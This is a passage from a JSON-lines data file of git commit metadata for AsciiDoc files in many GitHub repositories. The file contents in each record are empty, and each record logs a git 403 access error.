2017-10-27-Go-lang-memo.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-10-27-Go-lang-memo.adoc","new_file":"_posts\/2017-10-27-Go-lang-memo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"673a4b6bdb7e7d451250ba76c4aead3dec291f56","subject":"y2b create post The Best Bluetooth Speaker?","message":"y2b create post The Best Bluetooth Speaker?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-02-The-Best-Bluetooth-Speaker.adoc","new_file":"_posts\/2015-08-02-The-Best-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"260d4bb343f491e846f8d05460d2db275124f57c","subject":"y2b create post 5 Crazy Things At CES 2016","message":"y2b create post 5 Crazy Things At CES 2016","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-12-5-Crazy-Things-At-CES-2016.adoc","new_file":"_posts\/2016-01-12-5-Crazy-Things-At-CES-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"426ad8eb87ef623c3279074581b921a1981fc090","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ed421dbd3f87c6f0ccb6b23f5c7d2f30c38c5c3","subject":"Update 2017-04-14-Test-Post.adoc","message":"Update 2017-04-14-Test-Post.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-14-Test-Post.adoc","new_file":"_posts\/2017-04-14-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe58c29015875866060a6aa07ffb1ab844081b5b","subject":"Update 03_task_publishToConfluence.adoc","message":"Update 03_task_publishToConfluence.adoc\n\nFix spelling error","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48c0f974b58238683f8838ceea8d99dc724c877","subject":"Fix grid column sort order documentation (#8650)","message":"Fix grid column sort order documentation (#8650)\n\n* Fix grid column sort order documentation\n","repos":"mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,kironapublic\/vaadin,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,mstahv\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,peterl1084\/framework,kironapublic\/vaadin,asashour\/framework,mstahv\/framework,Darsstar\/framework,peterl1084\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02026cb9dc7555488c0669dcc9f1f11b39d24529","subject":"Updated table in single node document.","message":"Updated table in single node document.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/single_node_sw.adoc","new_file":"docs\/single_node_sw.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0834bd36c213c73baac32f0b9741dc65cb28a63f","subject":"Update 
2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","message":"Update 2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","new_file":"_posts\/2010-12-04-Ways-to-Reduce-Paper-Reliance-Through-Technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e99ba90045f96502d1715894eeeeac6050819c2","subject":"Polish contribution","message":"Polish contribution\n\nI don't think we want to keep this on a single line.\n\nCloses gh-4309\n","repos":"ihoneymon\/spring-boot,sbuettner\/spring-boot,srikalyan\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,linead\/spring-boot,sbcoba\/spring-boot,joshiste\/spring-boot,ameraljovic\/spring-boot,lexandro\/spring-boot,philwebb\/spring-boot-concourse,linead\/spring-boot,sebastiankirsch\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,brettwooldridge\/spring-boot,DeezCashews\/spring-boot,sbcoba\/spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,zhanhb\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,DeezCashews\/spring-boot,philwebb\/spring-boot-concourse,bbrouwer\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,dfa1\/spring-boot,mosoft521\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,yhj630520\/spring-boot,afroje-reshma\/spring-boot-sample,brettwooldridge\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,neo4j-contrib\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,isopov\/spring-boot,candrews\/spring-boot,minmay\/spring-boot,NetoDevel\/spring-boot,dfa1\/spring-boot,lexandro\/spring-boot,sbcoba\/spring-boot,ihoneymon\/spring-boot,deki\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,deki\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,Nowheresly\/spring-boot,yangdd1205\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,hqrt\/jenkins2-course-spring-boot,deki\/spring-boot,sbuettner\/spring-boot,sebastiankirsch\/spring-boot,jxblum\/spring-boot,kdvolder\/spring-boot,zhanhb\/spring-boot,RichardCSantana\/spring-boot,ihoneymon\/spring-boot,xiaoleiPENG\/my-project,vpavic\/spring-boot,mbogoevici\/spring-boot,neo4j-contrib\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,Nowheresly\/spring-boot,lburgazzoli\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,ollie314\/spring-boot,zhangshuangquan\/spring-root,kamilszymanski\/spring-boot,dfa1\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,izeye\/spring-boot,cleverjava\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,RichardCSantana\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,mosoft521\/spring-boot,qerub\/spring-boot,NetoDevel\/spring-boot,habuma\/spri
ng-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,mbenson\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,isopov\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,jbovet\/spring-boot,jvz\/spring-boot,lburgazzoli\/spring-boot,dreis2211\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,mbenson\/spring-boot,olivergierke\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,kamilszymanski\/spring-boot,jmnarloch\/spring-boot,srikalyan\/spring-boot,aahlenst\/spring-boot,joshiste\/spring-boot,akmaharshi\/jenkins,cleverjava\/jenkins2-course-spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,michael-simons\/spring-boot,dfa1\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,ilayaperumalg\/spring-boot,hqrt\/jenkins2-course-spring-boot,candrews\/spring-boot,i007422\/jenkins2-course-spring-boot,mbenson\/spring-boot,jvz\/spring-boot,wilkinsona\/spring-boot,qerub\/spring-boot,minmay\/spring-boot,pvorb\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,mrumpf\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,lexandro\/spring-boot,izeye\/spring-boot,nebhale\/spring-boot,jbovet\/spring-boot,sbuettner\/spring-boot,qerub\/spring-boot,bijukunjummen\/spring-boot,bjornlindstrom\/spring-boot,aahlenst\/spring-boot,lenicliu\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,shangyi0102\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,brettwooldridge\/spring-boot,javyzheng\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,jmnarloch\/spring-boot,joshiste\/spring-boot,pvorb\/spring-boot,ollie314\/spring-boot,aahlenst\/spring-boot,lburgazzoli\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,donhuvy\/spring-boot,ameraljovic\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,SaravananParthasarathy\/SPSDemo,eddumelendez\/spring-boot,hello2009chen\/spring-boot,lenicliu\/spring-boot,shangyi0102\/spring-boot,tsachev\/spring-boot,royclarkson\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rweisleder\/spring-boot,mbogoevici\/spring-boot,dreis2211\/spring-boot,zhanhb\/spring-boot,lucassaldanha\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,vakninr\/spring-boot,xiaoleiPENG\/my-project,shangyi0102\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,tsachev\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,philwebb\/spring-boot-concourse,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,habuma\/spring-boot,rweisleder\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,ptahchiev\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,hello2009chen\/sp
ring-boot,sebastiankirsch\/spring-boot,rweisleder\/spring-boot,ameraljovic\/spring-boot,mrumpf\/spring-boot,cleverjava\/jenkins2-course-spring-boot,minmay\/spring-boot,zhangshuangquan\/spring-root,Buzzardo\/spring-boot,jbovet\/spring-boot,lenicliu\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,ihoneymon\/spring-boot,ollie314\/spring-boot,shangyi0102\/spring-boot,lucassaldanha\/spring-boot,Nowheresly\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,lucassaldanha\/spring-boot,spring-projects\/spring-boot,mbogoevici\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,i007422\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,hqrt\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,dfa1\/spring-boot,xiaoleiPENG\/my-project,hello2009chen\/spring-boot,sebastiankirsch\/spring-boot,Buzzardo\/spring-boot,vpavic\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,RichardCSantana\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot,sbuettner\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,afroje-reshma\/spring-boot-sample,ptahchiev\/spring-boot,qerub\/spring-boot,royclarkson\/spring-boot,joshthornhill\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,cleverjava\/jenkins2-course-spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,bjornlindstrom\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,isopov\/spring-boot,yhj630520\/spring-boot,sbcoba\/spring-boot,mrumpf\/spring-boot,neo4j-contrib\/spring-boot,jxblum\/spring-boot,bijukunjummen\/spring-boot,joansmith\/spring-boot,afroje-reshma\/spring-boot-sample,rajendra-chola\/jenkins2-course-spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot-concourse,philwebb\/spring-boot,bclozel\/spring-boot,rweisleder\/spring-boot,bjornlindstrom\/spring-boot,brettwooldridge\/spring-boot,joansmith\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,nebhale\/spring-boot,mbenson\/spring-boot,bclozel\/spring-boot,cleverjava\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,bijukunjummen\/spring-boot,deki\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot,mosoft521\/spring-boot,bbrouwer\/spring-boot,candrews\/spring-boot,zhangshuangquan\/spring-root,vakninr\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,srikalyan\/spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,thomasdarimont\/spring-boot,jayarampradhan\/spring-boot,thomasdarimont\/spring-boot,RichardCSantana\/spring-boot,sebastiankirsch\/spring-boot,jvz\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,shakuzen\/spring-boot,jayarampradhan\/spring-boot,lexandro\/spring-boot,Buzzardo\/spring-boot,hello2009chen\/spring-boot,eddumelendez\/spring-boot,kamilszymanski\/spring-boot,htynkn\/spring-boot,mrumpf\/spring-boot,neo4j-contrib\/spring-boot,vpavic\/spring-boot,tsachev\/spring-boot,mbogoevici\/spring-boot,sbcoba\/spring-boot,michael-simons\/spr
ing-boot,dreis2211\/spring-boot,royclarkson\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,tiarebalbi\/spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,herau\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,thomasdarimont\/spring-boot,tsachev\/spring-boot,bclozel\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,herau\/spring-boot,herau\/spring-boot,linead\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,sbuettner\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,srikalyan\/spring-boot,zhangshuangquan\/spring-root,srikalyan\/spring-boot,linead\/spring-boot,rweisleder\/spring-boot,drumonii\/spring-boot,wilkinsona\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,wilkinsona\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot,nebhale\/spring-boot,royclarkson\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,jayarampradhan\/spring-boot,candrews\/spring-boot,jxblum\/spring-boot,minmay\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,qerub\/spring-boot,jbovet\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,joansmith\/spring-boot,ameraljovic\/spring-boot,jvz\/spring-boot,isopov\/spring-boot,mbenson\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,chrylis\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,bclozel\/spring-boot,olivergierke\/spring-boot,i007422\/jenkins2-course-spring-boot,shakuzen\/spring-boot,Nowheresly\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,donhuvy\/spring-boot,shangyi0102\/spring-boot,dreis2211\/spring-boot,joansmith\/spring-boot,lucassaldanha\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fb2361609b96baee4b0b9e21f87df3c8227ddc8","subject":"Update 2016-10-24-Computer-Science-Midterm.adoc","message":"Update 2016-10-24-Computer-Science-Midterm.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-24-Computer-Science-Midterm.adoc","new_file":"_posts\/2016-10-24-Computer-Science-Midterm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b327f92bed4de9e8813dee2f35566f5630275b19","subject":"y2b create post I've Got The iPhone X Prototype!!!","message":"y2b create post I've Got The iPhone X Prototype!!!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-08-Ive-Got-The-iPhone-X-Prototype.adoc","new_file":"_posts\/2017-07-08-Ive-Got-The-iPhone-X-Prototype.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c924fc5e8914ef83f47bb9b556fd10f7390a108","subject":"aggiunta della sintassi","message":"aggiunta della sintassi\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"sintassi.adoc","new_file":"sintassi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"20781357380ee82a62128bd6e2136f5d1a62f942","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0468065b7ae2d0938fe04d553bdda7eed74af2af","subject":"Update 2017-12-29-So-what-about-English-title.adoc","message":"Update 2017-12-29-So-what-about-English-title.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-12-29-So-what-about-English-title.adoc","new_file":"_posts\/2017-12-29-So-what-about-English-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb2e5b2b8defa82d562e13cb5287a108eb85fef","subject":"Adding 1.8 Final announcement","message":"Adding 1.8 Final announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-16-debezium-1.8-final-released.adoc","new_file":"_posts\/2021-12-16-debezium-1.8-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72336e58984f9197eb03860322a90c4bfa110d73","subject":"Write the async message passing guide","message":"Write the async message passing guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/async-message-passing.adoc","new_file":"docs\/src\/main\/asciidoc\/async-message-passing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1dffe6a7a1a3488f6221497638c0e5354cf3ba9","subject":"Update 2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","message":"Update 
2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","new_file":"_posts\/2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a0156289e602ba5e8237593b93cb19c561897fe","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a37c111b7c50bdc1c5c19658751f58b36fe0ef","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"866b0c145b6fd82e470f461d30db42eff795ecdd","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7df87857da049f97655d7e9335c6fe017434fa1d","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21dc7ada7cfe46a82863880238a76a22c0c90f2d","subject":"Update 2016-11-10-091800-Thursday-Morning.adoc","message":"Update 2016-11-10-091800-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08ecd6c229f12ce7c5f553736b8855475fcdfea4","subject":"y2b create post Epic iPhone 4S Unboxing","message":"y2b create post Epic iPhone 4S Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-14-Epic-iPhone-4S-Unboxing.adoc","new_file":"_posts\/2011-10-14-Epic-iPhone-4S-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f053b341a4fba4b401f82c99f55b3849d05769c","subject":"Started operator overloading notes","message":"Started operator overloading notes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week05.asciidoc","new_file":"asciidoc\/week05.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"882822852d11f4d5b3d21f7836a58766b829dbff","subject":"Use primitive types","message":"Use primitive types\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Null.adoc","new_file":"Best practices\/Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4bb97c202ed9811df96c078b1aa9561c1a6105f","subject":"Added instructions for downsampled data.","message":"Added instructions for downsampled 